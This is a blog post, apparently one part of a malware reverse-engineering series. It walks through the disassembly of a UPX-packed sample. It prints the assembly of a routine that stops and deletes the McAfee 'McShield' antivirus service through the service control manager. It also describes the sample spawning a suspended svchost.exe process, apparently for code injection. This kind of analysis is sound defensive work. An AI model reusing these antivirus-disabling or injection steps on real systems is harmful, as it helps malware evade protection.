As stated in my previous post, the call to search_process returns, and as EAX holds 0 the jump at 15161602 is taken and the search_proc_by_hash1 returns.
We proceed to search_proc_by_hash2
UPX0:15161504 search_proc_by_hash2: UPX0:15161504 push process_name_hash2 UPX0:1516150A call search_process UPX0:1516150F or eax, eax UPX0:15161511 jz locret_151615DD ... UPX0:151615DD locret_151615DD: UPX0:151615DD retn
Once again search_process returns 0, so the jump is taken (and search_proc_by_hash2 returns as well).
Afterwards a call to disable_McShield takes place.
UPX0:15161133 disable_McShield proc near UPX0:15161133 push 0F003Fh UPX0:15161138 push 0 UPX0:1516113A push 0 UPX0:1516113C call advapi_OpenSCManagerA UPX0:15161142 or eax, eax UPX0:15161144 jz short locret_15161197 UPX0:15161146 mov ServiceControlManagerHandle, eax UPX0:1516114B push 0F01FFh UPX0:15161150 push offset aMcshield ; "McShield" UPX0:15161155 push ServiceControlManagerHandle UPX0:1516115B call advapi_OpenServiceA UPX0:15161161 or eax, eax UPX0:15161163 jz short loc_1516118B UPX0:15161165 push eax UPX0:15161166 pop dword_15163200 UPX0:1516116C push offset unk_15163204 UPX0:15161171 push 1 UPX0:15161173 push dword_15163200 UPX0:15161179 call advapi_ControlService UPX0:1516117F push dword_15163200 UPX0:15161185 call advapi_DeleteService UPX0:1516118B UPX0:1516118B loc_1516118B: UPX0:1516118B push ServiceControlManagerHandle UPX0:15161191 call advapi_CloseServiceHandle UPX0:15161197 UPX0:15161197 locret_15161197: UPX0:15161197 retn UPX0:15161197 disable_McShield endp
First lets look at what OpenSCManagerA does:
from http://msdn.microsoft.com/en-us/library/ms684323(VS.85).aspx we can see that OpenSCManagerA
"Establishes a connection to the service control manager on the specified computer and opens the specified service control manager database."
And what is this service control manager? Again from msdn (http://msdn.microsoft.com/en-us/library/ms685150(VS.85).aspx)
"
The service control manager (SCM) is started at system boot. It is a remote procedure call (RPC) server, so that service configuration and service control programs can manipulate services on remote machines.
The service functions provide an interface for the following tasks performed by the SCM:
* Maintaining the database of installed services.
* Starting services and driver services either upon system startup or upon demand.
* Enumerating installed services and driver services.
* Maintaining status information for running services and driver services.
* Transmitting control requests to running services.
* Locking and unlocking the service database.
"
The function then tries to open a service named "McShield" (which in my case failed) and if the service exists, it marks the service for deletion from the service database.
The handles are then closed and the function returns.
After the call to disable_McShield there is a call to GetModuleFileNameA, which will return the full name of the executable file, that string is appended to "svchost.exe" and a process with command line set as "svchost.exe " is created with creation flags set to CREATE_SUSPENDED, and a handle to our module is retrieved through the call at 15161B1C to GetModuleHandleA (since 0 is passed as an argument).
No comments:
Post a Comment